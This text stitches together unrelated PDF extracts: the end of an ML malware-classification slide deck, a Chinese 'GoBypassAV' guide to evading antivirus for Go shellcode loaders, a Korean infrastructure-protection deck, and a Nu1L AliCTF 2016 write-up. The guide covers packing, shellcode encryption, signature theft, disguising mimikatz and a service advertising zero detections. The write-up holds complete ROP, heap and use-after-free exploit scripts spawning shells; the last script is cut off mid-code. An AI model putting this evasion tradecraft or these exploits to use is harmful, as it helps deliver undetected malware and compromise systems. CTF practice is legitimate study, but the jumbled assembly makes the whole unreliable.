More"Domain"Knowledge • Segment • Packer • Other"type"of"binary Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 63 Segments • Common"segment"name • Unique"segment"name 1. Ramnit 2. Lollipop 3. Kelihos_ver3 _data _text _rdata _text _data _text _rdata _rdata _data _bss _zenc _gnu_deb _tls Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 64 Other"Info"from"Segments • Number"of"Segments Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 65 Packer • Common"segment"name"of"Packer • UPX0/UPX1"only"in"class"8."Obfuscator.ACY Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 66 Other"Type"of"Binary • RAR"files" Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 67 Other"Type"of"Binary • Microsoft"Office"files" Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 68 Ensemble:"Linear"Blending • Combine"the"result"from"several"models • Vote"of"models Machine Learning Protect against tomorrow’s threats WORK'OF'WINNING'TEAM Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 70 Features • Instruction"n-gram • ASM"pixel"map http://blog.kaggle.com/2015/05/26/microsoft-malware-winners-interview-1st-place-no-to-overfitting/ Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 71 Features • ASM"pixel"map"(intensity"of"first"1000"bytes) Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 72 xgboost • Gradient"boosting"package • Widely"used"in"Kaggle"competition Machine Learning Protect against tomorrow’s threats CONCLUSION Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 74 Physical"Meaning"of"Features • Hex"n-gram • Opcode + imm/addr • Instruction"n-gram • Opcode Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 75 Happy"Ending? • Welcome"to"the"real"world! • New"malware"family • Mis-labelling • Mechanism"to"mitigate"the"issues. Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 76 Trend"Micro"XGen Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 77 Trend"Micro"ML"Contest • Malware"Identification"Challenge • 134"teams,"626"players,"from"6+"countries • Real-time"scoring Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 78 How"to"Improve"Model • Use"domain"knowledge • Unpack, unzip ... • Improve"feature"representation • Distinctive features for classes which you don’t do well • Regulate"overfitting Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 79 How"to"Improve"Model • Find"which"items"cannot"be"covered"by"model • Adjust"current"features • Find"new"features • Tuning"algorithm"parameters • Use"different"algorithm • Ensemble/Blending Machine Learning Protect against tomorrow’s threats Machine Learning Protect against tomorrow’s threats 80 Local"Library"vs."Cloud"Platform Cloud"platform"is"not"necessarily"easier • Glue"&"Integration • Data"(pre-)processing • Model"training"/"prediction • Evaluation • Diversity"of"ML"algorithms • Parameter"tuning Machine Learning Protect against tomorrow’s threats THANK'YOU
pdf
GoBypassAV 整理理了了基于Go的16种API免杀测试、8种加密测试、反沙盒测试、编译混淆、加壳、资源修改等免 杀技术,并搜集汇总了了⼀一些资料料和⼯工具。 免杀专题⽂文章及⼯工具:https://github.com/TideSec/BypassAntiVirus 免杀专题在线⽂文库:http://wiki.tidesec.com/docs/bypassav 本⽂文涉及的所有代码和资料料:https://github.com/TideSec/GoBypassAV/ 0x01 基于Go的免杀 Go语⾔言是⾕谷歌2009发布的第⼆二款开源编程语⾔言,Go语⾔言专⻔门针对多处理理器器系统应⽤用程序的编程进 ⾏行行了了优化,使⽤用Go编译的程序可以媲美C或C++代码的速度,⽽而且更更加安全、⽀支持并⾏行行进程。 基于Go的各种免杀也就是使⽤用不不同的windows API为shellcode申请⼀一段内存,然后把指令寄存器器 指向shellcode的开头,让机器器执⾏行行这段shellcode。除此之外,再加上⼀一些其他⽅方式,也可以有效 的提⾼高免杀效果。 本⽂文就这些常⽤用免杀⽅方式进⾏行行总结汇总。 0x02 使⽤用不不同API 在本系列列上⼀一篇⽂文章 《76.远控免杀专题(76)-基于Go的各种API免杀测试》 中,已经对常⻅见的 16 种API免杀 效果进⾏行行了了测试,⼤大家可以浏览参考。 测试使⽤用的平台为VT平台: https://virustotal.com/ 0x03 反沙盒检测 在本系列列的第75篇⽂文章 《75.远控免杀专题(75)-基于Go的沙箱检测》 中,对常⻅见的8种沙盒检测 ⽅方式进⾏行行了了总结。 具体沙盒检测代码在这⾥里里: https://github.com/TideSec/GoBypassAV/tree/main/SandBox 测试结果为如下。 未使⽤用沙箱检测技术的,VT查杀结果为:10/71 使⽤用了了沙箱检测技术的,VT查杀结果为:8/70 这些都属于⽐比较常规、简单且已经公开的⽅方式,所以差别不不是很⼤大,沙盒基本都能反反检测了了。 0x04 Go编译对免杀的影响 在使⽤用Go进⾏行行免杀的时候, go build 的编译选项也对免杀效果有较⼤大影响。 在编译时,常⽤用的编译命令为 go build -ldflags="-s -w -H=windowsgui" 测试使⽤用的平台为VT平台: https://virustotal.com/ ,使⽤用的是专题76中的 HelloTide 代 码。 L. 直接使⽤用 go build ,VT免杀率7/70,免杀效果最好的,但⽂文件相对⽐比较⼤大,⼀一 个 helloworld 都能1.8M。 N. -ldflags="-s -w" 参数:VT免杀率7/70,主要是减⼩小⽂文件⼤大⼩小, helloworld 能缩减到 1.2M,没有增强免杀效果。 O. -ldflags="-H=windowsgui" 参数:VT免杀率13/70,主要是隐藏窗⼝口,但会降低免杀效 果,VT查杀增加4。 Q. -race 参数:VT免杀率20/70,在2021年年的时候这个参数效果很好,但现在已经不不能⽤用了了, 正常的 helloworld 加上这个参数后VT平台直接16个报病毒。 所以⽐比较推荐的编译命令为 go build -ldflags="-s -w" ,但是这样就会有⿊黑窗⼝口,后⾯面会说如 何解决⿊黑窗⼝口的隐藏问题。 0x05 加壳混淆 对程序进⾏行行加壳或者混淆也是常⽤用的免杀⽅方式,本系列列⽂文章之前也介绍过⼀一些加壳软件,⽐比如upx 加壳之类的,这⾥里里对⽐比⼀一下对Go程序进⾏行行UPX加壳的免杀效果。 还是使⽤用上⾯面 go build ,VT免杀率7/70的程序进⾏行行加壳对⽐比。 5.1 upx加壳 使⽤用最优加壳 upx --best 00-HelloTide.exe -o upx-hello.exe 加壳后⼤大⼩小从1.8M降为1.08M,但是VT免杀率降到了了13/70。 5.2 shielden加壳 使⽤用 safengine shielden 加壳2.4.0.0 软件进⾏行行加壳,加壳后⽂文件居然变⼤大到了了2.5M,VT免杀 率居然降到了了33/70,可以直接放弃这个了了。 5.3 VMProtect加壳 使⽤用 VMProtect Ultimate 3.4.0 进⾏行行加壳,加壳后⽂文件居然6.3M,VT免杀率居然降到了了 19/70。⽂文件那么⼤大,免杀效果也⼀一般,也可以放弃了了。 5.4 garble代码混淆 使⽤用 garble 可对Go程序进⾏行行编译混淆,起到⼀一定的免杀作⽤用。 项⽬目地 址: https://github.com/burrowers/garble 在项⽬目中直接使⽤用 garble.exe build ,即可编译,编译⽂文件变⼩小为1.2M。 额,结果略略尴尬。 使⽤用两个参数 garble.exe -literals -seed=random build ,再次测试,还是略略尴尬。 0x06 对shellcode加密 在免杀中对payload进⾏行行先解密,然后运⾏行行时再解密,从⽽而逃避杀软的静态检测算是⽐比较常⻅见⽽而有 效的⼀一种⽅方式,我这⾥里里搜集整理理了了9种常⻅见的Golang的加解密⽅方法。 6.1 异或xor加密 这个⽐比较简单,设置个⾃自⼰己的密钥就可以,在 潮影在线免杀平台:http://bypass.tidesec.com/ 中也使⽤用了了异或加密。 详细代码在这 ⾥里里: https://github.com/TideSec/GoBypassAV/tree/main/Encryption/XOR_code 6.2 Base64编码 GO内置了了base64的包,可直接调⽤用,也可对shellcode进⾏行行多轮的base64编码。 package main import ( "encoding/base64" "fmt" ) func main(){ var str = "tidesec" strbytes := []byte(str) encoded := base64.StdEncoding.EncodeToString(strbytes) fmt.Println(encoded) decoded, _ := base64.StdEncoding.DecodeString(encoded) decodestr := string(decoded) fmt.Println(decodestr) } 6.3 AES加密 ⾼高级加密标准(Advanced Encryption Standard,缩写:AES),是美国联邦政府采⽤用的⼀一种区块 加密标准。现在,⾼高级加密标准已然成为对称密钥加密中最流⾏行行的算法之⼀一。 AES实现的⽅方式有5种: 1.电码本模式(Electronic Codebook Book (ECB)) 2.密码分组链接模式(Cipher Block Chaining (CBC)) 3.计算器器模式(Counter (CTR)) 4.密码反馈模式(Cipher FeedBack (CFB)) 5.输出反馈模式(Output FeedBack (OFB)) 我这是采⽤用的是电码本模式Electronic Codebook Book (ECB)。 代码在这⾥里里: https://github.com/TideSec/GoBypassAV/tree/main/Encryption/AES_code 代码参考 http://liuqh.icu/2021/06/19/go/package/16-aes/ 6.4 RC4加密 6.5 B85加密 参考代码: https://github.com/darkwyrm/b85 6.6 ⼋八卦加密 代码参考: https://github.com/Arks7/Go_Bypass 6.7 三重DES、RSA加密 偶然发现了了⼀一个专⻔门的GO的加解密项⽬目,很全⾯面。 项⽬目地址: https://github.com/wumansgy/goEncrypt go语⾔言封装的各种对称加密和⾮非对称加密,可以直接使⽤用,包括3重DES,AES的CBC和CTR模 式,还有RSA⾮非对称加密。 我把源码打包放在了了这⾥里里 https://github.com/TideSec/GoBypassAV/tree/main/Encryption/goEncrypt 6.8 ShellcodeUtils ⼀一个专⻔门针对shellcode进⾏行行加解密的脚本,可以实现XOR、AES256、RC4的加解密。 https://github.com/TideSec/GoBypassAV/tree/main/Encryption/ShellcodeUtils 0x07 资源修改 资源修改主要是修改图标、增加签名之类的。 从⽹网上找到了了⼀一个Go语⾔言的伪造签名的代码,Go版和Python版的代码在这⾥里里 https://github.com/TideSec/GoBypassAV/tree/main/SignThief 。 其他资源修改之前的⽂文章也都有介绍**《68.远控免杀专题(68)-Mimikatz免杀实践(上)》**。 该案例例是对mimikatz可执⾏行行程序的免杀测试,我这直接摘过来了了。 需要⼏几个软件,VMProtect Ultimate 3.4.0加壳软件,下载链接: https://pan.baidu.com/s/1VXaZgZ1YlVQW9P3B_ciChg 提取码: emnq 签名软件 https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/ sigthief.py 资源替换软件 ResHacker: https://github.com/TideSec/BypassAntiVirus/blob/master/tools/mimikatz /ResHacker.zip 先替换资源,使⽤用ResHacker打开mimikatz.exe,然后在图标⾥里里替换为360图标,version⾥里里⾯面⽂文字 ⾃自⼰己随意更更改。 这⾥里里先介绍⼀一种⽐比较常⻅见的pe免杀⽅方法,就是替换资源+加壳+签名,有能⼒力力的还可以pe修改,⽽而且mimikatz是开源 安装vmp加壳软件后,使⽤用vmp进⾏行行加壳 使⽤用 sigthief.py 对上⼀一步⽣生成的exe⽂文件进⾏行行签名。sigthief的详细⽤用法可以参 考 https://github.com/secretsquirrel/SigThief 。 然后看看能不不能运⾏行行,360和⽕火绒都没问题。 VT平台上 mimikatz32_360.exe ⽂文件查杀率9/70,缺点就是vmp加壳后会变得⽐比较⼤大。 0x08 架构的影响 编译⽣生成的程序如果x86或x64架构不不同,那么对免杀的影响也很⼤大,整理理来说x64程序免杀更更好⼀一 些。 我以专题76中提到的 08-EarlyBird 为例例进⾏行行测试,正常x64免杀为7/70。 编译x86架构的程序,VT免杀为21/70,差的还是⽐比较⼤大的。 0x09 隐藏窗⼝口 常规的隐藏窗⼝口⼀一般都是使⽤用 -H=windowsgui 参数,但这样会增⼤大杀软查杀的概率。 我这提供两种隐藏窗⼝口的代码。 完整代码在这⾥里里 https://github.com/TideSec/GoBypassAV/tree/main/HideWindow package main import "github.com/gonutz/ide/w32" func ShowConsoleAsync(commandShow uintptr) { console := w32.GetConsoleWindow() if console != 0 { _, consoleProcID := w32.GetWindowThreadProcessId(console) if w32.GetCurrentProcessId() == consoleProcID { w32.ShowWindowAsync(console, commandShow) } } } func main() { ShowConsoleAsync(w32.SW_HIDE) } 另外⼀一种,相⽐比第⼀一种,⽣生成的⽂文件略略⼤大⼀一点。 package main import "github.com/lxn/win" func main(){ win.ShowWindow(win.GetConsoleWindow(), win.SW_HIDE) } 0x10 ⼩小结 综上,做Go的免杀时,要注意下⾯面⼏几点。 1. API的选择⽐比较关键。 2. 选择合适的加密⽅方式来处理理shellcode 3. 尽量量⽣生成x64的shellcode,⽣生 成x64位程序 4. 编译时建议使⽤用 go build -ldflags="-s -w" go build -ldflags="-s -w" ,也可以使⽤用 garble garble 5. 加 壳的话可以使⽤用upx,其他如果有更更好的也可以使⽤用 6. 修改资源、加签名有⼀一定效果 7. 好的反沙 盒技巧还是很有效的 8. 隐藏窗⼝口不不要使⽤用 -H=windowsgui -H=windowsgui 参数 9. 使⽤用分配虚假内存等⽅方式可绕 过部分杀软 10. 采⽤用正常功能进⾏行行混淆,可增强免杀效果,但⽂文件可能变⼤大很多 0x11 Go免杀实践 通过对Go免杀的研究,实现了了⼀一个在线免杀平,主要⽤用于杀软技术研究和样本分析。同时也⽅方便便 有免杀需求,但没时间和精⼒力力去研究免杀的⼩小伙伴。 潮影在线免杀平台:http://bypass.tidesec.com/ 平台上使⽤用了了基于Go的7种API,并结合使⽤用了了上⾯面的shellcode加密、沙盒检测、⾏行行为混淆、随机 函数等⽅方式后,可实现VT平台查杀率3/70。⽽而在使⽤用了了shellcode分离后,⽬目前可实现VT平台0查 杀。 选择“URL加载”-“是”,⽣生成的TideAv_Go_XXXX_img.exe可以做到VT全免杀,⽀支持本地⽂文件加载 和⽹网络加载,图⽚片内置隐写的shellcode。 另外,⽬目前还添加了了两种基于Python的免杀⽅方式,⼀一种是基于RSA加密,⼀一种是基于pickle反序列列 化。使⽤用pyinstaller打包,经过⼀一些bypass处理理,⽬目前也可以接近VT平台0查杀。具体Python免杀 的实现后续⽂文章会介绍。 0x11 参考资料料 本⽂文内容参考节选⾃自以下资料料: go-shellcode项⽬目: https://github.com/Ne0nd0g/go-shellcode safe6Sec⼤大佬: https://github.com/safe6Sec/GolangBypassAV GoBypass: https://github.com/afwu/GoBypass AniYa免杀: https://github.com/piiperxyz/AniYa Go加解密: https://github.com/wumansgy/goEncrypt
pdf
Tram control system Hacking in Poland ‘2008.1 (Stuxnet) Nuclear power plant in Iran ‘2010.7 Banks and Broadcasting companies ‘2013.3 Waste water treatment system Hacking in Queensland ‘2000.4 Roosevelt dam hacking ‘1998.2 Georgia gov Website defaced 2008.8 Newzeland-Australia Network hacking 2007.9 Pentagon hacking ‘2007.6 Slammer warm Infection to Nuclear powerplant ‘2003.1 Train signal system sovic-F worm infection ‘2003.8 • Hacktivism • Malware, social engineering Strategic information war • Intended financial purpose • Attack by discontented people Intended cyber attack-Expert Hacker • Financial purpose • Show-off, Attacks targeted at random • Curiousity General cyber attack-Script kiddy • Targeted attack • Hired hacker • National terrorism • General attack 전 문 성 Current Social unrest Political purpose E X P E R T I S E Scale of damage Cyber attack trends Incident cases over the world - 4 - - 5 - Military Energy Transportation Banking E-Government Information & Telecommunications Health - 6 - - 7 - - 9 - - 10 - - 11 - - 12 - Committee on Information Infrastructure Protection (CIIP) Managemen t organization Disseminate the guidelines for protection plan establishment Submit the protection plan Check protection plan implementation Recommend infrastructure designation Disseminate the guidelines for protection measures establishment Proposing major agendas such as the protection plan Organizing the incident response headquarters Designate new infrastructure Submit protection measures Notify security incident Administration -Related organization Financial institutions Communica- tion-related organization Energy facilities Transportatio n-related institutions Etc. Related central administrative agencies Institutions for protection and support of CII - KISA - Information protection professional service company - ISAC - National security research institute Technical support Vulnerability analysis/ evaluation Etc. - 13 - - 15 - - 16 - - 17 - Vulnerability analysis Vulnerability evaluation  Identifying the check items  Checking by item  Assigning a risk grade  Establishing the improvement direction - 18 - - 19 - Establishing the vulnerability analysis/evaluation plan Selecting the vulnerability analysis/evaluation targets Performing vulnerability analysis Performing vulnerability evaluation Phase 1 Phase 2 Phase 3 Phase 4 - 20 - - 21 - - 22 - - 23 - Committee on Protection of Information and Communications Infrastructure (Chairman: Minister of the Office for Government Policy Coordination) Management organization Recovery and protection measures Information Infrastructure Security Incident Countermeasure Center (established upon the occurrence of a critical incident) 1. Security incident notification Related central administrative agencies Supporting recovery - related technologies Investigative agency KISA Supporting recovery - related technologies Appoint the head of the Countermeasure Center 4. Cooperation and support request 2. Quick response to prevent damage spread - 24 - MSIT NIS - Information protection professional service company - ISAC(Information Sharing and Analysis Centers) - National security research institute 3. Request recovery and protection support Thank you. Q & A Kim, Mideum belief1171@kisa.or.kr
pdf
[Nu1L] writup-for-Alictf-2016 MISC coloroverflow 首先感觉这种包名不像是 CTF 用的,所以直接 Google 之,发现是 Google Play 上开源的游戏 Color Overflow。于是下载下来进行比对,发现多出了几个类无法匹配上原 apk,所以猜测是 自己后加的。分别将多出的类分析之后,发现分别是用语发送请求、生成请求和工具类。我 将其命名为 LogClass、n 和 Utils 程序将请求生成之后向 log.godric.me 发送 POST 请求,在代码里发现数据发送之前用经过了 GZIP 压缩。在 pcap 中,也发现了这个请求,pcap 里显示确实有 Content-Encoding: gzip。用 wireshark 导出 http 数据得到了原始数据。 现 在 从 LogClass 往 上 找 , 发 现 GameView$1 里 的 new LogClass().execute(new ByteArrayOutputStream[]{v2.OutputRequestBody()});会调用 n 中的方法。然后 LogClass 里的 run 会发送。 public ByteArrayOutputStream OutputRequestBody() { try { this.output_stream.reset(); f.a(this.output_stream, this.szId); f.a(this.output_stream, this.CurMill); f.a(this.output_stream, this.Rand); f.a(this.output_stream, this.d); this.output_stream.flush(); } catch(Exception v0) { v0.printStackTrace(); } return this.output_stream; } 其中 d 是由要发送的数据进行 AES 加密后得到的,在 GetRequestBody 这个方法中。 这部分缓存了要发送的数据。a 方法有三个重载,都将输出到缓冲区。分别会先输出对应的 类型标志,21、18 和 24。接下来,字符串类型会字符串长度,然后输出字符串;字节数组 会输出一个字节表示长度,然后输出所有字节;长整型会按 7 位分组然后高位作为结尾标 志,每次输出一个字节,高位为 0 表示结束。 因此我们可以从 pcap 导出的数据中还原出 szId, CurMil, Rand, d。 szId 被计算 MD5 后,摘要作为 key(未编码成十六进制字符串),Rand 和 CurMill 进行循环 异或得到 IV。因此 key 和 IV 也可以计算出来。 再来看 AES: if(i == 0) { int j; for(j = 0; j < block_size; ++j) { block[j] = ((byte)(padded_input[j] ^ arg13[j])); } } else { int j; for(j = 0; j < block_size; ++j) { block[j] = ((byte)(padded_input[i * 16 + j] ^ block_out[j])); } } block_out = AES.EncryptBlock(block); System.arraycopy(block_out, 0, outbuf, i * 16, block_size); 这部分看出,该 AES 将上一轮的输出和输入进行异或再加密,因此是 CBC 模式。 还原出 IV 和 key,还有 encrypted 之后,便可以进行解密。解密出来发现其中包含 flag。 szid = 'bb39b07060deabd5' curmill = [0xb9, 0xe8, 0xf3, 0xd3, 0xca, 0x2a] curmill = [i & (~128) for i in curmill] curmill = sum([curmill[i] << (7*i) for i in range(len(curmill))]) print curmill rand = '46 51 4b f9 f2 b3 cd 3b f5 80 b7 cd 9b ae 45 14'.split() rand = [int(i, 16) for i in rand] import md5 m = md5.md5() m.update(szid) key = m.digest() print 'key', map(ord, key) IV = [(curmill >> (i*8)) & 255 for i in range(8)][::-1] IV = [rand[i] ^ IV[i%8] for i in range(len(rand))] IV = ''.join(map(chr, IV)) print 'IV', map(ord, IV) with open('encrypted') as f: encrypted = f.read() from Crypto.Cipher import AES aes_d = AES.new(key, AES.MODE_CBC, IV) print aes_d.decrypt(encrypted) PWN Vss 存在一个栈溢出,输入的第 0x48-0x50 个字节刚好覆盖返回地址,用 ROPgadget 找到一个 ropchain,由于第 0x48-0x50 个字节是返回地址,再找一个 add rsp ret 的 gadget 增加 rsp 的 地址就可以返回到 ropchain from pwn import * from struct import pack p = remote('121.40.56.102', 2333) recv_content = p.recvuntil('Password:\n') p2 = '' p2 += pack('<Q', 0x0000000000401937) # pop2 rsi ; ret p2 += pack('<Q', 0x00000000006c4080) # @ .data p2 += pack('<Q', 0x000000000046f208) # pop2 rax ; ret p2 += '/bin//sh' p2 += pack('<Q', 0x000000000046b8d1) # mov qword ptr [rsi], rax ; ret p2 += pack('<Q', 0x0000000000401937) # pop2 rsi ; ret p2 += pack('<Q', 0x00000000006c4088) # @ .data + 8 p2 += pack('<Q', 0x000000000041bd1f) # xor rax, rax ; ret p2 += pack('<Q', 0x000000000046b8d1) # mov qword ptr [rsi], rax ; ret p2 += pack('<Q', 0x0000000000401823) # pop2 rdi ; ret p2 += pack('<Q', 0x00000000006c4080) # @ .data p2 += pack('<Q', 0x0000000000401937) # pop2 rsi ; ret p2 += pack('<Q', 0x00000000006c4088) # @ .data + 8 p2 += pack('<Q', 0x000000000043ae05) # pop2 rdx ; ret p2 += pack('<Q', 0x00000000006c4088) # @ .data + 8 p2 += pack('<Q', 0x000000000041bd1f) # xor rax, rax ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret p2 += pack('<Q', 0x000000000045f2a5) # syscall ; ret payload1 = 'py' + 'B' * (0x4e - 0x8) + p64(0x000000000044892a) + 'A' * (0xd0 - 0x50) + p2 p.sendline(payload1) p.interactive() fb 教科书一般的 off-by-one 脚本: #!/usr/bin/env python2 # -*- coding:utf-8 -*- from pwn import * import os # flag : alictf{FBfbFbfB23666} # switches DEBUG = 0 # modify this ''' if DEBUG: io = process('./fb') else: io = remote('121.40.56.102',9733) ''' if DEBUG: context(log_level='debug') # define symbols and offsets here # simplified r/s function def ru(delim): return io.recvuntil(delim) def rn(count): return io.recvn(count) def sl(data): return io.sendline(data) def sn(data): return io.send(data) def info(string): return log.info(string) # define interactive functions here def menu(): return ru('Choice:') def addmsg(length): menu() sl('1') ru(':') sl(str(length)) return def setmsg(index,content): menu() sl('2') ru(':') sl(str(index)) ru(':') sl(content) return def delmsg(index): menu() sl('3') ru(':') sl(str(index)) return def leak(addr): if '\x0a' in p64(addr): return '\x00' # :< setmsg(1, p64(addr) + p32(100)) delmsg(2) buf = ru('Done').rstrip('Done') if len(buf) == 0: return '\x00' return buf + '\x00' printf = 0x4006E0 ptr = 0x6020c0 ptr2 = 0x6020e0 freegot = 0x602018 # define exploit function here def pwn(): if DEBUG: gdb.attach(io) #elf = ELF('./fb') addmsg(248) addmsg(240) # xxx addmsg(256) addmsg(248) addmsg(240) addmsg(256) addmsg(256) addmsg(256) setmsg(7, '%17$p') payload = '' payload += p64(0) + p64(0xf1) payload += p64(ptr-0x18) + p64(ptr-0x10) payload = payload.ljust(240, '\x00') payload += p64(0xf0) setmsg(0,payload) delmsg(1) payload2 = p64(0) + p32(0) + p32(16) + p64(0) + p64(freegot) + p64(2000) + p64(0x6020e0) + p32(0x1000) setmsg(0, payload2) setmsg(0, p64(printf)[:-1]) delmsg(7) buf = ru('Done').rstrip('Done').lstrip('0x') libc_start_main_ret = int(buf, 16) #info('Libc leaked = ' + hex(libc_start_main_ret)) libc = libc_start_main_ret - 0x21f45 system = libc + 0x0000000000046590 setmsg(6, '/bin/sh;') setmsg(0, p64(system)[:-1]) delmsg(6) io.interactive() return if __name__ == '__main__': io = remote('114.55.103.213',9733) pwn() io.close() routers connect(0,1), connect(1,2)会导致 router 0 中指针单向指向 router 1, 此时 delete(1)会导致 uaf. 脚本: #!/usr/bin/env python2 # -*- coding:utf-8 -*- from pwn import * import os # flag : alictf{S0rry_F0r_USiNG_CP1uSp1Us_vTaB1es} # switches DEBUG = 0 # libc = 2.19 ubuntu-6.9 os.environ["LD_PRELOAD"] = "./libc-x.so" # modify this if DEBUG: io = process('./routers') else: io = remote('114.55.103.213',6565) if DEBUG: context(log_level='debug') # define symbols and offsets here # simplified r/s function def ru(delim): return io.recvuntil(delim) def rn(count): return io.recvn(count) def sl(data): return io.sendline(data) def sn(data): return io.send(data) def info(string): return log.info(string) # define interactive functions here def create_route(t,name): ru('>') sl('create router') ru(':') sl(t) ru('name: ') sl(name) return def create_terminal(t,name,attached): ru('>') sl('create terminal') ru(':') sl(attached) ru(':') sl(t) ru(':') sl(name) return def delete_router(name): ru('>') sl('delete router') ru(':') sl(name) return def connect(name1, name2): ru('>') sl('connect') ru(':') sl(name1) ru(':') sl(name2) return def disconnect(name): ru('>') sl('disconnect') ru(':') sl(name) return def show(): ru('>') sl('show') return # define exploit function here def pwn(): if DEBUG: gdb.attach(io) # uaf in disconnect create_route('cisco', '123') create_route('cisco', 'aaa') create_route('cisco', 'bbb') connect('123', 'aaa') connect('aaa', 'bbb') delete_router('aaa') create_terminal('osx','hello','bbb') show() ru('to ') pie = u64(ru('\n')[:-1].ljust(8,'\x00')) - 0x204b30 info('PIE Leaked = ' + hex(pie)) got = pie + 0x204EC8 create_route('cisco', 'b1') create_route('cisco', 'b2') create_route('cisco', 'b3') create_route('cisco', 'b4') connect('b1','b2') connect('b2','b3') delete_router('b2') delete_router('b4') payload = 'A'*0x8 + p64(got) + p64(0) + p64(0)[:-1] create_route('cisco', payload) show() ru('to ') ru('to ') #offset_setvbuf = 0x70670 offset_setvbuf = 0x705a0 libc = u64(ru('\n')[:-1].ljust(8,'\x00')) - offset_setvbuf info('Libc Leaked = ' + hex(libc)) # leak heap address delete_router(payload) xxx_vtable = libc + 0x3BE060 - 8 payload2 = p64(xxx_vtable) + p64(pie) + p64(0) + p64(0)[:-1] create_route('cisco', payload2) create_route('cisco', 'feeder') delete_router('feeder') disconnect('b1') show() for i in xrange(6): ru('named ') heap_addr = u64(ru(' ')[:-1].ljust(8,'\x00')) - 0x340 info('Heap addr leaked = ' + hex(heap_addr)) # final stage create_route('cisco', 'c1') create_route('cisco', 'c2') create_route('cisco', 'c3') create_route('cisco', 'c4') connect('c1', 'c2') connect('c2', 'c3') delete_router('c2') delete_router('c4') gadget = libc + 0xE4968 payload3 = p64(heap_addr+0x450) + p64(pie) + p64(0) + p64(0)[:-1] create_route('cisco', payload3) spray = 7 * p64(gadget) create_route('cisco', spray) ''' poprdi = libc + 0x0000000000022b9a system = libc + 0x46590 binsh = libc + 0x17C8C3 ropchain 